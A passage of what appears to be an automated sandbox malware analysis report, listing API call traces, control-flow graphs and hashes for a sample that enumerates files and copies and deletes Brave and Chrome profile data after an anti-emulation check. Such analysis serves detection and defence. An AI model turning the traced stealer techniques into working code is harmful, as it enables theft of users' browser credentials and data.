                              control_flow_graph 2556 7c8c88-7c8cc4 StrCmpCA 2558 7c8ccd-7c8ce6 2556->2558 2559 7c8cc6-7c8cc7 ExitProcess 2556->2559 2561 7c8cec-7c8cf1 2558->2561 2562 7c8ee2-7c8eef call 7b2a20 2558->2562 2564 7c8cf6-7c8cf9 2561->2564 2566 7c8cff 2564->2566 2567 7c8ec3-7c8edc 2564->2567 2568 7c8dbd-7c8dcb StrCmpCA 2566->2568 2569 7c8ddd-7c8deb StrCmpCA 2566->2569 2570 7c8dfd-7c8e0b StrCmpCA 2566->2570 2571 7c8e1d-7c8e2b StrCmpCA 2566->2571 2572 7c8e3d-7c8e4b StrCmpCA 2566->2572 2573 7c8d5a-7c8d69 lstrlen 2566->2573 2574 7c8e56-7c8e64 StrCmpCA 2566->2574 2575 7c8d30-7c8d3f lstrlen 2566->2575 2576 7c8e6f-7c8e7d StrCmpCA 2566->2576 2577 7c8e88-7c8e9a lstrlen 2566->2577 2578 7c8d84-7c8d92 StrCmpCA 2566->2578 2579 7c8da4-7c8db8 StrCmpCA 2566->2579 2580 7c8d06-7c8d15 lstrlen 2566->2580 2567->2562 2598 7c8cf3 2567->2598 2568->2567 2583 7c8dd1-7c8dd8 2568->2583 2569->2567 2584 7c8df1-7c8df8 2569->2584 2570->2567 2585 7c8e11-7c8e18 2570->2585 2571->2567 2586 7c8e31-7c8e38 2571->2586 2572->2567 2587 7c8e4d-7c8e54 2572->2587 2596 7c8d6b-7c8d70 call 7b2a20 2573->2596 2597 7c8d73-7c8d7f call 7b2930 2573->2597 2574->2567 2590 7c8e66-7c8e6d 2574->2590 2594 7c8d49-7c8d55 call 7b2930 2575->2594 2595 7c8d41-7c8d46 call 7b2a20 2575->2595 2576->2567 2591 7c8e7f-7c8e86 2576->2591 2592 7c8e9c-7c8ea1 call 7b2a20 2577->2592 2593 7c8ea4-7c8eb0 call 7b2930 2577->2593 2578->2567 2582 7c8d98-7c8d9f 2578->2582 2579->2567 2588 7c8d1f-7c8d2b call 7b2930 2580->2588 2589 7c8d17-7c8d1c call 7b2a20 2580->2589 2582->2567 2583->2567 2584->2567 2585->2567 2586->2567 2587->2567 2615 7c8eb3-7c8eb5 2588->2615 2589->2588 2590->2567 2591->2567 2592->2593 2593->2615 2594->2615 2595->2594 2596->2597 2597->2615 2598->2564 2615->2567 2616 7c8eb7-7c8eb9 2615->2616 2616->2567 2617 7c8ebb-7c8ebd lstrcpy 2616->2617 2617->2567
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 650a97de59e0a6dcd28bc28c5cbdf775ffc420abc5c839facf63ac0fd46f8673
                              • Instruction ID: 659c96c844014a9eae313833f59156b9b76618f3fefe874ea94970e0edde9882
                              • Opcode Fuzzy Hash: 650a97de59e0a6dcd28bc28c5cbdf775ffc420abc5c839facf63ac0fd46f8673
                              • Instruction Fuzzy Hash: 43E09279015348EFCB34DBA5C884C2A7769EF88305B06005CEA006F762DA30FD01C7A6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2618 7d2ad0-7d2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2619 7d2b44-7d2b59 2618->2619 2620 7d2b24-7d2b36 2618->2620
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007D2AFF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D2B06
                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 007D2B1A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: d4bebbc9d0876ad81d78a604e72a43128a2031d880a48cf4775e4722232f7ebf
                              • Instruction ID: 750dbe903dbdc439811ed2bffc5e2af94c72a6c0fbe1accff899c6b1f19c5a32
                              • Opcode Fuzzy Hash: d4bebbc9d0876ad81d78a604e72a43128a2031d880a48cf4775e4722232f7ebf
                              • Instruction Fuzzy Hash: CB01D6B2A44248ABC710DF99EC85B9DF7B8F745B22F00026BF915D3780D778190087A1
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B1046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 007B104D
                              • ExitProcess.KERNEL32 ref: 007B1058
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: f0b0152ea2adccaf57d99363d7a38833a4e27ec03ec0607fe448d2e869ca5392
                              • Instruction ID: 3e68c3ac0847ef78dca0340e2346737282e0c36579616e4f16bff025f98b06b9
                              • Opcode Fuzzy Hash: f0b0152ea2adccaf57d99363d7a38833a4e27ec03ec0607fe448d2e869ca5392
                              • Instruction Fuzzy Hash: 5DE0C2B068C3C4BFEB2117615C9EF163E2CAB22B06F804004F705AE0D1E6E8A900A775
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C23D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C23F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C2402
                              • lstrlen.KERNEL32(\*.*), ref: 007C240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 007C2436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C2486
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: d5cb819a78a6b370f60f802d14184e4754617671e8f9557f33bbc129b51debeb
                              • Instruction ID: a8b12fea42886207de98c4c52780fe0d5d0f60796e7c470f1f69817b6b00df30
                              • Opcode Fuzzy Hash: d5cb819a78a6b370f60f802d14184e4754617671e8f9557f33bbc129b51debeb
                              • Instruction Fuzzy Hash: C5A27F71916656DBDB21AF78DC89FAE77B9AF04700F04816CB809E7252DB38DD428B90
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B16E2
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B176C
                              • lstrcat.KERNEL32(00000000), ref: 007B1776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B17A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B17EF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B17F9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1825
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1875
                              • lstrcat.KERNEL32(00000000), ref: 007B187F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B18AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B18F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B18FE
                              • lstrlen.KERNEL32(007E1794), ref: 007B1909
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1929
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1935
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B195B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1966
                              • lstrlen.KERNEL32(\*.*), ref: 007B1971
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B198E
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 007B199A
                                • Part of subcall function 007D4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 007D406D
                                • Part of subcall function 007D4040: lstrcpy.KERNEL32(00000000,?), ref: 007D40A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B19C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1A0E
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1A16
                              • lstrlen.KERNEL32(007E1794), ref: 007B1A21
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1A41
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1A4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1A76
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1A81
                              • lstrlen.KERNEL32(007E1794), ref: 007B1A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1AAC
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1AB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1ADE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1AE9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1B11
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007B1B45
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007B1B70
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007B1B8A
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1BC4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1BFB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1C03
                              • lstrlen.KERNEL32(007E1794), ref: 007B1C0E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1C31
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1C3D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1C69
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1C74
                              • lstrlen.KERNEL32(007E1794), ref: 007B1C7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1CA2
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1CAE
                              • lstrlen.KERNEL32(?), ref: 007B1CBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1CDB
                              • lstrcat.KERNEL32(00000000,?), ref: 007B1CE9
                              • lstrlen.KERNEL32(007E1794), ref: 007B1CF4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1D14
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1D20
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1D46
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1D51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1D7D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1DE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1DEB
                              • lstrlen.KERNEL32(007E1794), ref: 007B1DF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1E19
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1E25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1E4B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1E56
                              • lstrlen.KERNEL32(007E1794), ref: 007B1E61
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1E81
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1E8D
                              • lstrlen.KERNEL32(?), ref: 007B1E9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1EBA
                              • lstrcat.KERNEL32(00000000,?), ref: 007B1EC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1EF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1F3E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007B1F45
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1F9F
                              • lstrlen.KERNEL32(01458B08), ref: 007B1FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 007B1FE3
                              • lstrlen.KERNEL32(007E1794), ref: 007B1FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B200E
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B2042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B204D
                              • lstrlen.KERNEL32(007E1794), ref: 007B2058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2075
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B2081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                              • String ID: \*.*
                              • API String ID: 4127656590-1173974218
                              • Opcode ID: 35f62ff9fc82ba698b1bdbc995aa87beeaa8e20406e21768edf0ff1b2342167a
                              • Instruction ID: 7868125f61dbcfa136c17404cf8a343f1301d12e6436792cdc53dce9017cdcae
                              • Opcode Fuzzy Hash: 35f62ff9fc82ba698b1bdbc995aa87beeaa8e20406e21768edf0ff1b2342167a
                              • Instruction Fuzzy Hash: D9927271916256DBDB21EF64DC89BEE77B9AF44700F854124F809B7252DB38ED02CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDBEF
                              • lstrlen.KERNEL32(007E4CA8), ref: 007BDBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDC17
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007BDC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDC4C
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDC8F
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007BDCD0
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007BDCF0
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007BDD0A
                              • lstrlen.KERNEL32(007DCFEC), ref: 007BDD1D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDD7B
                              • lstrlen.KERNEL32(007E1794), ref: 007BDD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDDA3
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDDAF
                              • lstrlen.KERNEL32(?), ref: 007BDDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 007BDDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDE19
                              • lstrlen.KERNEL32(007E1794), ref: 007BDE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BDE6F
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDE7B
                              • lstrlen.KERNEL32(014587F8), ref: 007BDE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDEBB
                              • lstrlen.KERNEL32(007E1794), ref: 007BDEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BDEE6
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDEF2
                              • lstrlen.KERNEL32(01458AA8), ref: 007BDF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDFA5
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDFB1
                              • lstrlen.KERNEL32(014587F8), ref: 007BDFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDFF4
                              • lstrlen.KERNEL32(007E1794), ref: 007BDFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE022
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BE02E
                              • lstrlen.KERNEL32(01458AA8), ref: 007BE03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BE06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 007BE0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 007BE0E7
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE11F
                              • lstrlen.KERNEL32(0145CF08), ref: 007BE12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE155
                              • lstrcat.KERNEL32(00000000,?), ref: 007BE15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE19F
                              • lstrcat.KERNEL32(00000000), ref: 007BE1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007BE1F9
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE22F
                              • lstrlen.KERNEL32(01458B08), ref: 007BE23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE261
                              • lstrcat.KERNEL32(00000000,01458B08), ref: 007BE269
                              • lstrlen.KERNEL32(\Brave\Preferences), ref: 007BE274
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE29B
                              • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 007BE2A7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE2CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE30F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE349
                              • DeleteFileA.KERNEL32(?), ref: 007BE381
                              • StrCmpCA.SHLWAPI(?,0145CF80), ref: 007BE3AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE3F4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE41C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE445
                              • StrCmpCA.SHLWAPI(?,01458AA8), ref: 007BE468
                              • StrCmpCA.SHLWAPI(?,014587F8), ref: 007BE47D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE4D9
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007BE4E0
                              • StrCmpCA.SHLWAPI(?,0145D070), ref: 007BE58E
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BE5C4
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007BE639
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE678
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE6A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE6C7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE70E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE737
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE75C
                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 007BE776
                              • DeleteFileA.KERNEL32(?), ref: 007BE7D2
                              • StrCmpCA.SHLWAPI(?,01458AB8), ref: 007BE7FC
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE88C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE8B5
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE8EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BE916
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BE952
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
